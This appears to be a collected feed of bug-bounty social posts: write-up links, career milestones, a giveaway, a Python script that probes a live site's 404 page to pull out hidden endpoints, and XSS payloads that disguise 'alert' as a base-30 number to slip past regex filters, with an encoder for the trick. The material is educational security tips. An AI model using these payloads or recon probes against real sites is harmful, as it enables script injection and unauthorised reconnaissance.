New bug bounty write-up published.
How I discovered a business logic flaw in a shopping cart API that allowed bypassing product purchase limits
medium.com/@raslanco/unlimited-shopping-exploiting-a-cart-logic-flaw-to-bypass-product-limits-0c0d26e22672
#bugbounty #bugbountytips #bugbountytip #infosec #writeups #hackerone
🔍 Abusing 404 Pages for Endpoint Discovery
(The Hidden Recon Technique No One Talks About)
Most hackers move on when they hit a 404 page. It just says “Not Found,” right? But here’s the twist: sometimes those 404 pages leak information about real endpoints.
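The 404 template is normally rendered by the same application and layout as every other page, so it can carry the site's navigation links, script bundles and in-page API calls even though the path you asked for does not exist. As an added example (not code from the original post), the script below pulls candidate endpoints out of a 404 body: it collects absolute paths from href/src/action attributes and from quoted string literals in inline JavaScript, strips query strings and fragments, and by default drops static assets. The sample body, every path in it and the `fetch_404_body` helper (which requests a random path that cannot exist) are constructed for this example.

```python
"""Extract candidate endpoints from a 404 response body (added example)."""
import os
import re
import secrets
import urllib.error
import urllib.request

# Absolute paths in markup attributes and in quoted string literals (inline JS).
ATTR_RE = re.compile(r"""(?:href|src|action)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
QUOTED_RE = re.compile(r"""["'`](/[^"'`\s<>]*)["'`]""")
STATIC_EXT = {".css", ".js", ".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico",
              ".woff", ".woff2", ".map"}

# Constructed sample 404 page; no real target is represented here.
SAMPLE_404 = """<!doctype html>
<html><head><title>404 Not Found</title>
<link rel="stylesheet" href="/static/css/app.css">
<script src="/static/js/app.bundle.js"></script>
</head><body>
<h1>Page not found</h1>
<p>Try the <a href="/dashboard">dashboard</a> or
<a href="/account/settings?tab=security">your settings</a>.</p>
<script>
  fetch("/api/v2/session/refresh", {method: "POST"});
  const adminBase = '/internal/admin/';
  window.analyticsEndpoint = "/api/v2/telemetry/pageview#missing";
</script>
</body></html>
"""


def _normalize(raw):
    """Keep only site-relative paths; drop protocol-relative URLs, query and fragment."""
    if not raw.startswith("/") or raw.startswith("//"):
        return None
    path = raw.split("?", 1)[0].split("#", 1)[0]
    return path if len(path) > 1 else None


def is_static(path):
    """True for assets (css/js/images/fonts) that are rarely interesting as endpoints."""
    return os.path.splitext(path)[1].lower() in STATIC_EXT


def extract_paths(body, include_static=False):
    """Return the sorted, de-duplicated set of candidate paths found in `body`."""
    found = set()
    for rx in (ATTR_RE, QUOTED_RE):
        for m in rx.finditer(body):
            path = _normalize(m.group(1))
            if path and (include_static or not is_static(path)):
                found.add(path)
    return sorted(found)


def fetch_404_body(base_url, timeout=10):
    """Request a random path that cannot exist and return the 404 body, else None."""
    url = base_url.rstrip("/") + "/" + secrets.token_hex(8)
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout):
            return None  # the random path unexpectedly exists
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return err.read().decode("utf-8", "replace")
        return None


if __name__ == "__main__":
    import sys
    body = fetch_404_body(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_404
    for candidate in extract_paths(body or ""):
        print(candidate)
```

Run it with a base URL to probe a live target, or with no arguments to see it pull `/account/settings`, `/api/v2/session/refresh`, `/api/v2/telemetry/pageview`, `/dashboard` and `/internal/admin/` out of the constructed sample. Paths found this way are only candidates: confirm each with a real request, because templates also reference routes that have since been removed.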
My friend made a very interesting disclosure while searching for vulnerabilities. I personally couldn't believe it when I saw that he was able to take a Self-XSS in a Ruby on Rails application to RCE. Deserves time to read 👇
medium.com/@handball10/from-self-xss-to-rce-in-ruby-on-rails-1f9f2d33c1cb
2024 was incredible – grateful for everyone who made it special! 🙌
💰 $2,000,000 all-time bounties on @Hacker0x01
💸 2 Mega bounties on @Bugcrowd – $80,000 & $125,000
🏆 Live Hacking Event Awards from Miami, Seattle, Paris, Gdansk, Las Vegas, and Edinburgh
📈 Back to full-time at @wiz_io in an exciting role after scaling my startup @shockwave_sec
🌍 40 flights and millions in miles – fortunate enough to fly first class with @lufthansa, @emirates & @SingaporeAir
Looking ahead…
I'm shifting focus from bug bounty to deeper security & cloud risk research. I found some incredible bugs recently that I can’t wait to share with the community.
There’s a lot more to come! 🙂
Final giveaway of the year🎁:
4️⃣Hands-On Web Exploitation (Course Only, hhub.io/2024holidays)
3️⃣Shodan Codes
2️⃣Caido licenses
1️⃣Hands-On Web Exploitation (Certificate+Course Bundle)
To enter drop a 🫶🏼and RT
0-100 in Bug Bounty with a 9-5 job
Finally, after 125 hours of rigorous testing in the 56 days since starting bug bounty from scratch, I received my first bounty, a 4-digit one at that, on the main domain of one of the largest public bug bounty programs.
Way more to go!!!!!
@Rhynorater
Day 45: 0-100k in bug bounty with a 9-5 job
Today I reported my First BAC Issue, and this time I am pretty confident.
In total I tested 29 scenarios today for IDORs and BAC issues.
Let's hope for the best.
Also, do check my previous post for some cool IDOR Tips.
@Rhynorater
Day 37: 0-100k in bug bounty with a 9-5 job
Continued studying IDOR vulnerabilities from various blog posts and kept improving my notes.
Learnt about different ways to exploit IDOR and how to combine them with other attacks.
View Comments for Resources.
@Rhynorater
@librarymindset I want to change my life by reading non-fiction books. So I have read many books, but none of them inspire me. Those books motivate me for a day or two.
An XSS payload with alert obfuscation, to bypass RegEx filters:
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
#infosec #cybersec #bugbountytip
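How the number in that payload is built, as an added example that is not part of the original post: `Number.prototype.toString(radix)` spells digits 10 and above with the lowercase letters a-z, so any identifier made of a-z and 0-9 can be written as an integer literal that decodes back to the identifier at runtime, and a filter that looks for the string `alert` never sees it. In `8680439..toString(30)` the first dot terminates the number literal and the second is the property access, which is why no parentheses are needed. The `NAIVE_FILTER` regex below stands in for the kind of blacklist the trick is meant to slip past and is an assumption of this example, as is the `top[...]` call shape, which is simply copied from the payload above.

```javascript
// Added example: derive the base-N integer behind `8680439..toString(30)`.
const DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz";

// Smallest radix in which every character of `name` is a valid digit.
// For "alert" the largest digit is 't' (29), so the radix must be >= 30.
function minRadix(name) {
  let max = 0;
  for (const ch of name) {
    const v = DIGITS.indexOf(ch);
    if (v < 0) throw new Error(`"${ch}" cannot be produced by toString(radix)`);
    if (v > max) max = v;
  }
  return Math.max(max + 1, 2);
}

// Integer n such that n.toString(radix) === name.
// Radix must be within [minRadix(name), 36]; identifiers whose value would
// exceed Number.MAX_SAFE_INTEGER are rejected because they would not round-trip.
function encodeIdentifier(name, radix) {
  const lo = minRadix(name);
  if (!Number.isInteger(radix) || radix < lo || radix > 36) {
    throw new RangeError(`radix must be an integer in [${lo}, 36]`);
  }
  let n = 0;
  for (const ch of name) n = n * radix + DIGITS.indexOf(ch);
  if (!Number.isSafeInteger(n)) {
    throw new RangeError("identifier too long to round-trip exactly");
  }
  return n;
}

// Round-trip check: what the browser will evaluate at runtime.
function decodeIdentifier(n, radix) {
  return n.toString(radix);
}

// Build the call expression in the same shape as the payload above.
function obfuscatedCall(name, argSource, radix = minRadix(name)) {
  const n = encodeIdentifier(name, radix);
  return `top[${n}..toString(${radix})](${argSource})`;
}

// Assumed blacklist of the kind such payloads are designed to evade.
const NAIVE_FILTER = /alert|confirm|prompt/i;

function filterCatches(payload) {
  return NAIVE_FILTER.test(payload);
}

// Demonstration when run directly with node.
if (typeof require !== "undefined" && require.main === module) {
  const plain = "alert(1337)";
  const hidden = obfuscatedCall("alert", "1337");
  console.log(hidden);                                  // top[8680439..toString(30)](1337)
  console.log(decodeIdentifier(8680439, 30));           // alert
  console.log(filterCatches(plain), filterCatches(hidden)); // true false
}
```

Any radix from 30 to 36 works for `alert` (radix 36 gives the other well-known form, `17795081..toString(36)`), so a defence that merely adds `8680439` to a blacklist is pointless; decode or tokenise the script rather than matching the string `alert`.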